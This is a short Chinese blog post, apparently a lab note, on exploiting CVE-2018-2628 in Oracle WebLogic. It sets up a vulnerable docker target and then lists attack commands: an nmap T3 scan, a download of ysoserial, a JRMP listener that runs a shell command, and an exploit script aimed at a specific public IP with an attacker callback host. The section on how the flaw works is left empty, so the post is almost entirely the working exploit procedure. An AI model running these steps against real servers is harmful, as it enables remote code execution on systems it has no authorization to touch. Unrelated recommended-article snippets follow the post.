CVE-2018-2628

环境搭建

 weblogic靶机:
      docker pull zhiqzhao/ubuntu_weblogic1036_domain
      docker images
      docker run -d -p7001:7001 zhiqzhao/ubuntu_weblogic1036_domain 

 攻击的服务器:
       java + python2环境即可

  docker学习笔记: https://www.evernote.com/shard/s461/sh/bc38ea4c-3bfe-4321-ab3c-1742f69998e4/4e371b210ab3b23e9df415f54dadaabb

漏洞利用

在windows上执行exploit,返回数据二进制会在cmd中报错,但是命令是可以执行成功的,Linux下是没有报错的。

攻击机执行命令:
nmap -sV --script=weblogic-t3-info -Pn 120.77.253.216 -p7001
wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1  'touch /tmp/zhenxin'
python cve-2018-2628.py 120.77.253.216 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 122.152.233.180 1099 JRMPClient2
image.png

image.png

image.png

漏洞原理

明天补。

参考文章

https://blog.csdn.net/archersaber39/article/details/80135463#t0

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • Android - 收藏集
    Android 自定义View的各种姿势1 Activity的显示之ViewRootImpl详解 Activity...
    passiontim阅读 173,842评论 25 709
  • 在ios开发路上查阅的资料
    在此特此声明:一下所有链接均来自互联网,在此记录下我的查阅学习历程,感谢各位原创作者的无私奉献 ! 技术一点一点积...
    远航的移动开发历程阅读 11,314评论 12 197
  • Android(2017-2018)BAT面试题整理(Android篇,含答案)
    Android(2017-2018)BAT面试题整理(Android篇,含答案) 版权声明:本文为博主原创文章,未...
    nic启立阅读 30,543评论 11 471
  • 随笔
    焦点网络初期七期 平瑞青 坚持分享第203天(2018.3.20)周二 昨晚安顿好老妈睡觉后,赶紧打开手机进入信阳...
    平凡也好阅读 134评论 0 0
  • 嗯。给你
    年末的一份总结,好像一切来的刚刚好。如果你有幸点开了,就与我有故事可说 明信片收到了,你看,在这里 微信和你聊天,...
    Promise姗阅读 457评论 0 0